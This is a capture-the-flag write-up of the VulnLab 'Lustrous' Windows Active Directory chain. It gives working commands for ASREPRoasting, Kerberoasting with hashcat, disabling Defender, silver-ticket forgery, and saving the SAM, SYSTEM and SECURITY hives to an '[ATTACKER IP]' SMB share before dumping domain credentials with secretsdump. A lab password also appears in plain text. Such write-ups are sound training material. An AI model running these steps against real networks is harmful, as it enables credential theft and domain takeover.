This is a writeup of the chain Lustrous from VulnLab , it’s a medium difficulty Windows chain which featured ASREPRoasting, Kerberoasting, PowerShell Credential abuse, and the remote exploitation of SeBackupPrivilege.
🔍 Enumeration
An initial nmap scan of the hosts gave the following results:
nmap -sV -sC -T4 -Pn 10.10.159.53-54 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-12 19:13 EST Stats: 0:00:30 elapsed; 0 hosts completed (2 up), 2 undergoing Script Scan NSE Timing: About 98.22% done; ETC: 19:13 (0:00:00 remaining) Nmap scan report for 10.10.159.53 Host is up (0.097s latency). Not shown: 985 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_12-26-21 11:50AM <DIR> transfer | ftp-syst: |_ SYST: Windows_NT 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: IIS Windows Server | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-13 00:13:14Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name) 443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 | ssl-cert: Subject: commonName=LusDC.lustrous.vl | Subject Alternative Name: DNS:LusDC.lustrous.vl | Not valid before: 2021-12-26T09:46:02 |_Not valid after: 2022-12-26T00:00:00 |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2024-12-13T00:14:04+00:00; -10s from scanner time. | rdp-ntlm-info: | Target_Name: LUSTROUS | NetBIOS_Domain_Name: LUSTROUS | NetBIOS_Computer_Name: LUSDC | DNS_Domain_Name: lustrous.vl | DNS_Computer_Name: LusDC.lustrous.vl | Product_Version: 10.0.20348 |_ System_Time: 2024-12-13T00:13:23+00:00 | ssl-cert: Subject: commonName=LusDC.lustrous.vl | Not valid before: 2024-12-12T00:10:11 |_Not valid after: 2025-06-13T00:10:11 Service Info: Host: LUSDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for 10.10.159.54 Host is up (0.100s latency). Not shown: 996 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=LusMS.lustrous.vl | Not valid before: 2024-12-12T00:10:12 |_Not valid after: 2025-06-13T00:10:12 |_ssl-date: 2024-12-13T00:14:04+00:00; -10s from scanner time. | rdp-ntlm-info: | Target_Name: LUSTROUS | NetBIOS_Domain_Name: LUSTROUS | NetBIOS_Computer_Name: LUSMS | DNS_Domain_Name: lustrous.vl | DNS_Computer_Name: LusMS.lustrous.vl | DNS_Tree_Name: lustrous.vl | Product_Version: 10.0.20348 |_ System_Time: 2024-12-13T00:13:24+00:00 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
❯ ftp LusDC.lustrous.vl Connected to LusDC.lustrous.vl. 220 Microsoft FTP Service Name (LusDC.lustrous.vl:lfgberg): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 229 Entering Extended Passive Mode (|||50101|) 125 Data connection already open; Transfer starting. 12-26-21 11:50AM <DIR> transfer 226 Transfer complete. ftp> cd transfer 250 CWD command successful. ftp> ls 229 Entering Extended Passive Mode (|||50103|) 125 Data connection already open; Transfer starting. 12-26-21 11:51AM <DIR> ben.cox 12-26-21 11:49AM <DIR> rachel.parker 12-26-21 11:49AM <DIR> tony.ward 12-26-21 11:50AM <DIR> wayne.taylor 226 Transfer complete.
There’s a transfer folder that gets us a list of usernames
1 2 3 4
ben.cox rachel.parker tony.ward wayne.taylor
Looking inside the user folders, there’s a users.csv file we can pull from transfers/ben.cox
1 2 3 4 5 6 7 8 9 10 11 12 13 14
ftp> cd ben.cox 250 CWD command successful. ftp> ls 229 Entering Extended Passive Mode (|||50105|) 125 Data connection already open; Transfer starting. 12-26-21 11:51AM 2944 users.csv 226 Transfer complete. ftp> get users.csv local: users.csv remote: users.csv 229 Entering Extended Passive Mode (|||50107|) 125 Data connection already open; Transfer starting. 100% |***********************************************************| 2944 28.47 KiB/s 00:00 ETA 226 Transfer complete. 2944 bytes received in 00:00 (28.40 KiB/s)
This wasn’t super interesting… Just information on groups.
I tried to checkout the website on LusDC, and SMB on both hosts to no avail. The website gave me a 401 unauthorized IIS page, we can probably come back to this with credentials.
🔥 Roasting
Since we have a list of users, we can try ASREPRoasting to get a user.
/home/lfgberg/.local/bin/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). now = datetime.datetime.utcnow() + datetime.timedelta(days=1) $krb5asrep$23$ben[email protected]:[SNIPPED] [-] User rachel.parker doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User tony.ward doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User wayne.taylor doesn't have UF_DONT_REQUIRE_PREAUTH set
Tossing that into hashcat we’re able to toss the password for ben.cox
1
hashcat -a 0 -m 18200 asrep.hash [wordlist]
Now, since we have a user I decided to try Kerberoasting to see if there’s any other accounts we can pop.
1 2 3 4 5 6 7 8 9 10
❯ GetUserSPNs.py -request -dc-ip [IP] lustrous.vl/ben.cox -outputfile kerberoast.hash Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
This got us hashes for svc_web and svc_db, which we can toss into hashcat.
1
hashcat -a 0 -m 13100 ./kerberoast.hash [wordlist]
This popped the password for svc_web, svc_db didn’t crack.
🧔 Ben Cox
Now with our two users ben.cox and svc_web I decided to checkout WinRM, and SMB on each machine. There wasn’t anything interesting SMB wise, but ben.cox is able to WinRM into LusMS.
Before poking at LusMS, I ran bloodhound as ben.cox.
❯ bloodhound-python -d lustrous.vl -u ben.cox -p '[PASSWORD]' -ns [DCIP] -c all --zip INFO: Found AD domain: lustrous.vl INFO: Getting TGT for user INFO: Connecting to LDAP server: lusdc.lustrous.vl INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 2 computers INFO: Connecting to LDAP server: lusdc.lustrous.vl INFO: Found 28 users INFO: Found 59 groups INFO: Found 2 gpos INFO: Found 6 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: LusMS.lustrous.vl INFO: Querying computer: LusDC.lustrous.vl WARNING: Could not resolve: LusMS.lustrous.vl: The resolution lifetime expired after 3.105 seconds: Server Do53:10.10.159.53@53 answered The DNS operation timed out. INFO: Done in 00M 14S INFO: Compressing output into 20241212192826_bloodhound.zip
Ben’s a member of the IT group, but that doesn’t seem to get us anything cool other than maybe the WinRM into LusMS.
The svc_web account is used for the http service on LusDC, which could come in handy for the website later.
As Ben I WinRM’d into LusMS, and found an admin.xml file on his Desktop.
❯ evil-winrm -i 10.10.159.54 -u 'ben.cox' -p 'Trinity1' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\ben.cox\Documents> cd ..\Desktop *Evil-WinRM* PS C:\Users\ben.cox\Desktop> ls
Directory: C:\Users\ben.cox\Desktop
Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 12/26/2021 10:30 AM 1652 admin.xml
This file looks to be a PowerShell Credential File containing credentials for the local administrator on this machine. We can import that as a Credential Object, and dump the password.
Next I WinRM’d in as local admin on LusMS with the credentials we found, grabbed the flag, and popped a sliver beacon.
🌐 Back to Web
I wasn’t able to find anything from Mimikatz, or doing any other kind of credential hunting that would help to pivot back to LusDC on disk. But RDP is open on this machine, and viewing the website on LusDC through RDP prompts for a login page.
Logging in as ben.cox, it looks to be a notetaking site. It says it uses single sign on from a company machine.
Checking out the actual notes, there’s a password reminder, and a note that this app uses “Kerberos Authentication on IIS”.
Since this is using Kerberos Authentication, we should be able to mint a silver ticket to impersonate a given user against this site to view their password (assuming the hint shows for all users).
I chose tony.ward as my target since he’s in the Backup Admins group, and presumably has SeBackupPrivilege.
I performed all the following actions as local admin on LusMS via RDP, trying this remotely via evil-winrm doesn’t work since it already uses up a Kerberos hop .
First I turned off defender, and dropped mimikatz to disk.
1
Set-MpPreference-DisableRealtimeMonitoring$true
Next, we can mint and pass a silver ticket for use on the website.
The domain SID i pulled from bloodhound, the id comes from tony’s SID, and the hash of svc_web can be used for RC4.
Now, running klist we can verify that the ticket was successfully created and passed.
Lastly, with iwr we can use the ticket to get Tony’s password.
1 2
# -UseDefaultCredentials tells IWR to use the ticket we minted (iwr-Uri"LusDC.lustrous.vl/internal"-UseDefaultCredentials-UseBasicParsing).content
Se🔙🆙Privilege
I tried WinRM and RDP, but Tony can’t get a session, so we’ll need to remotely exploit SeBackupPrivilege
This can be done with Impacket’s reg.py to save registry hives to a remote SMB share. Initially I used the following method to save the SAM, SYSTEM, and SECURITY hives, but I experienced frequent timeouts.
Instead I pivoted to saving them individually which worked fine.
1 2 3
reg.py "lustrous.vl"/"tony.ward":"[PASS]"@"[DC IP]" save -keyName 'HKLM\SAM' -o '\\[ATTACKER IP]\erm' reg.py "lustrous.vl"/"tony.ward":"[PASS]"@"[DC IP]" save -keyName 'HKLM\SYSTEM' -o '\\[ATTACKER IP]\erm' reg.py "lustrous.vl"/"tony.ward":"[PASS]"@"[DC IP]" save -keyName 'HKLM\SECURITY' -o '\\[ATTACKER IP]\erm'
Then I used secretsdump.py to dump credentials.
1
secretsdump.py -sam ./SAM.save -system ./SYSTEM.save -security ./SECURITY.save local
This got us credentials for the local admin, and the machine account for LusDC. We can use the machine account to run secretsdump.py to dump domain credentials from the DC.
